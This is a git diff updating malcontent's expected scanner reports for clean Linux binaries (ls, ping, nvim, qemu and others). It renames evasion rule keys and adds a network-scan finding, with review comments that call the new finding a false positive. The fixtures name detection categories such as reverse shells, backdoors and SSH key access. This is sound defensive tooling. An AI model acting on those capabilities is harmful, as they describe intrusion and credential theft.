fs/file/delete: medium fs/file/delete_forcibly: low fs/file/make_executable: medium diff --git a/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple b/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple index e5fa47d26..da76501a0 100644 --- a/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple +++ b/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple 
@@ -1,7 +1,7 @@
 # linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json: high
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/dev_shm: low
-evasion/hidden_paths/hidden: high
+evasion/file/location/dev_shm: medium
+evasion/file/prefix: high
+evasion/file/prefix/dev: low
 exec/shell/command: medium
 fs/path/etc: low
 fs/path/etc_initd: medium
diff --git a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
index 7628d3546..e2a82f889 100644
--- a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
+++ b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
@@ -52,7 +52,8 @@ data/encoding/json_decode: low
 data/encoding/json_encode: low
 data/hash/md5: low
 discover/network/mac_address: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
+evasion/rootkit/refs: medium
 exec/cmd: medium
 exec/plugin: low
 exec/shell/power: medium
@@ -75,8 +76,8 @@ impact/remote_access/iptables: medium
 impact/remote_access/reverse_shell: high
 impact/remote_access/trojan: medium
 impact/rootkit: low
-impact/rootkit/refs: medium
 lateral/scan/brute_force: low
+lateral/scan/tool: high
 net/dns/txt: low
 net/download: medium
 net/http/post: medium
diff --git a/tests/linux/clean/kuma-cp.simple b/tests/linux/clean/kuma-cp.simple
index ce32d7bad..a06ab3b47 100644
--- a/tests/linux/clean/kuma-cp.simple
+++ b/tests/linux/clean/kuma-cp.simple
@@ -41,8 +41,8 @@ discover/user/USER: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/iptables: medium
 evasion/bypass_security/linux/se: medium
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/var_run: medium
+evasion/file/prefix: medium
 exec/cmd: medium
 exec/conditional/LANG: low
 exec/plugin: low
@@ -81,6 +81,7 @@ fs/watch: low
 hw/dev/block_ice: medium
 impact/remote_access/heartbeat: medium
 impact/remote_access/iptables: medium
+lateral/scan/tool: medium
 net/dns: low
 net/dns/reverse: medium
 net/dns/servers: low
diff --git a/tests/linux/clean/ld-2.27.so.simple b/tests/linux/clean/ld-2.27.so.simple
index ed8d10b80..f9e612813 100644
--- a/tests/linux/clean/ld-2.27.so.simple
+++ b/tests/linux/clean/ld-2.27.so.simple
@@ -12,5 +12,5 @@ fs/tempdir: low
 impact/exploit/GCONV_PATH: low
 net/url/embedded: low
 persist/shell/bash: medium
-process/thread_local_storage: low
+process/thread_local_storage: medium
 sus/exclamation: medium
diff --git a/tests/linux/clean/libsystemd.so.0.simple b/tests/linux/clean/libsystemd.so.0.simple
index 3800798c7..904a7a5e4 100644
--- a/tests/linux/clean/libsystemd.so.0.simple
+++ b/tests/linux/clean/libsystemd.so.0.simple
@@ -2,7 +2,7 @@
 data/compression/lzma: low
 data/random/insecure: low
 discover/user/USER: low
-evasion/hidden_paths/var_run: medium
+evasion/file/location/var_run: medium
 exec/program: medium
 exec/shell/TERM: low
 fs/file/copy: medium
@@ -20,6 +20,7 @@ fs/proc/self_cmdline: medium
 fs/proc/self_exe: medium
 fs/proc/self_status: medium
 fs/watch: low
+lateral/scan/tool: medium
 mem/anonymous_file: medium
 net/ip/addr: medium
 net/resolve/hostport_parse: low
@@ -37,5 +38,5 @@ process/multithreaded: low
 process/name_set: medium
 process/namespace_set: low
 process/parent_pid_get: low
-process/thread_local_storage: low
+process/thread_local_storage: medium
 process/userid_set: low
diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md
index fe3d4731f..0581d57d9 100644
--- a/tests/linux/clean/ls.x86_64.md
+++ b/tests/linux/clean/ls.x86_64.md
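Review bot: `process/thread_local_storage` is bumped from low to medium on `ld-2.27.so.simple`, and again on `libsystemd.so.0.simple` in the next hunk, so the glibc dynamic loader — the object that actually implements `__tls_get_addr` — now contributes a MEDIUM to a clean baseline for doing its job. The severity change presumably comes from `rules/process/thread_local_storage.yara`, which is in the diffstat but not in this chunk, so I cannot see what motivated it. If the intent was to catch unusual TLS use in ordinary programs, consider keeping the plain `__tls_get_addr` import at low and reserving medium for a stricter condition, otherwise every glibc-linked baseline will carry this hit.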
@@ -2,6 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | | LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | diff --git a/tests/linux/clean/lslogins.md b/tests/linux/clean/lslogins.md index c668064d7..61a1256c2 100644 --- a/tests/linux/clean/lslogins.md +++ b/tests/linux/clean/lslogins.md 
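Review bot: The `lateral/scan/tool` row added here scores GNU `ls` as MEDIUM "may scan networks" on the evidence `connect`, `port`, `socket` and `target`, which read as libc import names and ordinary words rather than scanner behaviour, and the same rule is added to the containerd, libsystemd, kuma-cp, nvim, opa and melange fixtures in this commit. Accepting these snapshots bakes a false positive into the clean corpus. The rule itself (`rules/lateral/scan/scan_tool.yara`) is not in this chunk, but from the evidence shown it appears to fire on a few bare substrings; requiring `fullword` matches, dropping the libc symbols `connect` and `socket` from the trigger set, or raising the minimum number of distinct strings would likely exclude `ls` while still matching the cpack case above, whose evidence includes `%d.%d.%d.%d`, `probe` and `scan`.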
@@ -4,7 +4,7 @@ |--------|--------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | HIGH | [evasion/logging/historical_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/historical_logins.yara#login_records) | accesses historical login records | [/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code) | | MEDIUM | 
[collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [evasion/logging/failed_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/failed_logins.yara#failed_logins) | accesses failed logins | [/var/log/btmp](https://github.com/search?q=%2Fvar%2Flog%2Fbtmp&type=code) | | MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/zlib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fzlib%2Flib&type=code) | | MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./include](https://github.com/search?q=.%2Finclude&type=code) | diff --git a/tests/linux/clean/melange.simple b/tests/linux/clean/melange.simple index a17f603f6..e5eeedda2 100644 --- a/tests/linux/clean/melange.simple +++ b/tests/linux/clean/melange.simple @@ -44,9 +44,9 @@ discover/user/HOME: low discover/user/USER: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium -evasion/hidden_paths/hidden: medium +evasion/file/location/system_directories: medium +evasion/file/prefix: medium evasion/hide_artifacts/pivot_root: medium -evasion/hide_artifacts/system_directories: medium exec/cmd: medium exec/install_additional/pip_install: medium exec/plugin: low @@ -94,6 +94,7 @@ fs/unmount: low fs/watch: low impact/remote_access/heartbeat: medium impact/remote_access/kill_rm: medium +lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/tests/linux/clean/misp_sample.ndjson.log.simple b/tests/linux/clean/misp_sample.ndjson.log.simple index eedc03a76..e318a6866 100644 --- a/tests/linux/clean/misp_sample.ndjson.log.simple +++ b/tests/linux/clean/misp_sample.ndjson.log.simple @@ -3,10 +3,10 @@ c2/addr/ip: medium c2/tool_transfer/download: high crypto/aes: low +evasion/rootkit/refs: high exec/shell/command: medium false-positives/filebeat: low impact/ransom/decryptor: medium impact/remote_access/backdoor: high -impact/rootkit/refs: high net/url/embedded: medium os/fd/multiplex: low diff --git a/tests/linux/clean/mongosh.simple b/tests/linux/clean/mongosh.simple index 0bf8f2dd6..a2b7f4434 100644 --- a/tests/linux/clean/mongosh.simple +++ b/tests/linux/clean/mongosh.simple 
@@ -48,7 +48,7 @@ discover/user/HOME: low
 discover/user/USER: low
 discover/user/info: medium
 discover/user/name_get: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 evasion/logging/acct: low
 exec/cmd: medium
 exec/conditional/LANG: low
diff --git a/tests/linux/clean/nvim.simple b/tests/linux/clean/nvim.simple
index 3f1bafa25..cdba2a285 100644
--- a/tests/linux/clean/nvim.simple
+++ b/tests/linux/clean/nvim.simple
@@ -16,8 +16,8 @@ discover/processes/pgrep: medium
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/x11: low
+evasion/file/location/tmp_x11_unix: low
+evasion/file/prefix: medium
 exec/conditional/LANG: low
 exec/dylib/symbol_address: medium
 exec/plugin: low
@@ -54,6 +54,7 @@ fs/tempdir/TEMP: low
 fs/tempdir/TMPDIR: low
 fs/tempdir/create: low
 fs/tempdir/tempfile_create: low
+lateral/scan/tool: medium
 net/dns/servers: low
 net/download/fetch: medium
 net/http/post: medium
diff --git a/tests/linux/clean/opa.simple b/tests/linux/clean/opa.simple
index 360cb7418..25d47620c 100644
--- a/tests/linux/clean/opa.simple
+++ b/tests/linux/clean/opa.simple
@@ -53,6 +53,7 @@ fs/proc/self_cgroup: medium
 fs/proc/self_mountinfo: medium
 fs/tempdir/tempfile_create: low
 fs/watch: low
+lateral/scan/tool: medium
 net/dns: low
 net/dns/reverse: medium
 net/dns/servers: low
diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md
index fd1071a42..cb282ccb5 100644
--- a/tests/linux/clean/pandoc.md
+++ b/tests/linux/clean/pandoc.md
@@ -21,7 +21,7 @@
 | MEDIUM | [discover/group/lookup](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/group/lookup.yara#getgrent) | get entry from group database | [endgrent](https://github.com/search?q=endgrent&type=code)
[getgrent](https://github.com/search?q=getgrent&type=code)
[setgrent](https://github.com/search?q=setgrent&type=code) | | MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) | | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [CmdForListBodyStartCmd](https://github.com/search?q=CmdForListBodyStartCmd&type=code)
[SystemziProcess_runCommand1_closure](https://github.com/search?q=SystemziProcess_runCommand1_closure&type=code)
[SystemziProcess_runCommand1_info](https://github.com/search?q=SystemziProcess_runCommand1_info&type=code)
[SystemziProcess_runCommand2_closure](https://github.com/search?q=SystemziProcess_runCommand2_closure&type=code)
[SystemziProcess_runCommand3_bytes](https://github.com/search?q=SystemziProcess_runCommand3_bytes&type=code)
[SystemziProcess_runCommand_closure](https://github.com/search?q=SystemziProcess_runCommand_closure&type=code)
[SystemziProcess_runCommand_info](https://github.com/search?q=SystemziProcess_runCommand_info&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | diff --git a/tests/linux/clean/ping.x86_64.md b/tests/linux/clean/ping.x86_64.md index 9a3b9ab45..f2f50ce2f 100644 --- a/tests/linux/clean/ping.x86_64.md +++ b/tests/linux/clean/ping.x86_64.md @@ -5,6 +5,7 @@ | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Port](https://github.com/search?q=Port&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) | | MEDIUM | [discover/system/network](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/system_network.yara#sys_net_recon) | collects system and network information | [id](https://github.com/search?q=id&type=code)
[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
[ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code) | | MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | | MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping -6 -N](https://github.com/search?q=ping+-6+-N&type=code)
[ping broadcast](https://github.com/search?q=ping+broadcast&type=code)
[ping does not fragment](https://github.com/search?q=ping+does+not+fragment&type=code)
[ping for user must be](https://github.com/search?q=ping+for+user+must+be&type=code)
[ping session](https://github.com/search?q=ping+session&type=code)
[ping statistics ---](https://github.com/search?q=ping+statistics+---&type=code) |
 | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) |
diff --git a/tests/linux/clean/pulumi.simple b/tests/linux/clean/pulumi.simple
index 26472bd5f..0f4a608e6 100644
--- a/tests/linux/clean/pulumi.simple
+++ b/tests/linux/clean/pulumi.simple
@@ -46,7 +46,7 @@ discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 exec/cmd: medium
 exec/conditional/LANG: low
 exec/install_additional/pip_install: medium
diff --git a/tests/linux/clean/pypi_package_index.json.simple b/tests/linux/clean/pypi_package_index.json.simple
index 00f118f0f..362414c5c 100644
--- a/tests/linux/clean/pypi_package_index.json.simple
+++ b/tests/linux/clean/pypi_package_index.json.simple
@@ -111,6 +111,7 @@ evasion/bypass_security/linux/ufw: medium
 evasion/logging/acct: low
 evasion/process_injection/ptrace: medium
 evasion/process_injection/readelf: medium
+evasion/rootkit/refs: medium
 exec/dylib/symbol_address: medium
 exec/install_additional/pip_install: high
 exec/plugin: low
@@ -152,10 +153,10 @@ impact/remote_access/net_shell: high
 impact/remote_access/reverse_shell: high
 impact/remote_access/trojan: medium
 impact/rootkit: low
-impact/rootkit/refs: medium
 impact/ui/screen_capture: high
 impact/ui/x11_auth: medium
 lateral/scan/brute_force: low
+lateral/scan/tool: high
 net/dns/over_https: medium
 net/download: medium
 net/http/auth: low
diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md
index f7d0f95b6..dc3add18d 100644
--- a/tests/linux/clean/qemu-system-xtensa.md
+++ b/tests/linux/clean/qemu-system-xtensa.md
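Review bot: The new `lateral/scan/tool` row for ping is backed only by the tokens `connect`, `port`, `probe`, `scan` and `socket`, which are socket-API names and help-text words found in almost any networked program, and the same MEDIUM hit is added to the expected reports for melange, nvim, opa, redis-server, rules.json, the runtime-security eBPF objects, sonarlint, sudo and tracer.o in this patch (HIGH for pypi_package_index.json). Accepting these rows in `clean` fixtures bakes a lateral-movement finding into the clean baseline, which suggests the `generic_scan_tool` change in `rules/lateral/scan/scan_tool.yara` (outside this chunk, so inferred from the expected outputs) matches too broadly. Consider requiring at least one scanner-specific string alongside these common tokens, or lowering the rule's severity, before the expected outputs are updated to accept the hits.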
@@ -10,7 +10,7 @@ | MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [/.ssh/config](https://github.com/search?q=%2F.ssh%2Fconfig&type=code) | | MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | | MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [evasion/indicator_blocking/vm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/indicator_blocking/vm.yara#hidden_qemu) | operates a QEMU VM | [QEMU_VFIO](https://github.com/search?q=QEMU_VFIO&type=code)
[unable to find CPU model '%s'](https://github.com/search?q=unable+to+find+CPU+model+%27%25s%27&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [qapi_free_MigrationExecCommand](https://github.com/search?q=qapi_free_MigrationExecCommand&type=code)
[visit_type_MigrationExecCommand_members](https://github.com/search?q=visit_type_MigrationExecCommand_members&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execv](https://github.com/search?q=execv&type=code) | @@ -29,7 +29,7 @@ | MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [vdagent](https://github.com/search?q=vdagent&type=code) | | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) | | MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | exec chdir and socket | [chdir](https://github.com/search?q=chdir&type=code)
[execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) | diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md index 300e3d50b..9e4875559 100644 --- a/tests/linux/clean/redis-server.aarch64.md +++ b/tests/linux/clean/redis-server.aarch64.md @@ -16,6 +16,7 @@ | MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | | MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) |
 | MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) |
 | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) |
diff --git a/tests/linux/clean/rules.json.simple b/tests/linux/clean/rules.json.simple
index a941c2be7..eede552e9 100644
--- a/tests/linux/clean/rules.json.simple
+++ b/tests/linux/clean/rules.json.simple
@@ -26,8 +26,8 @@ discover/system/platform: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/iptables: medium
 evasion/bypass_security/linux/ufw: medium
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/var_run: medium
+evasion/file/prefix: medium
 evasion/logging/acct: low
 evasion/process_injection/readelf: medium
 exec/plugin: low
@@ -55,6 +55,7 @@ hw/wireless: low
 impact/exploit: medium
 impact/exploit/cve: medium
 impact/remote_access/iptables: medium
+lateral/scan/tool: medium
 net/dns/servers: low
 net/download: medium
 net/http/cookies: medium
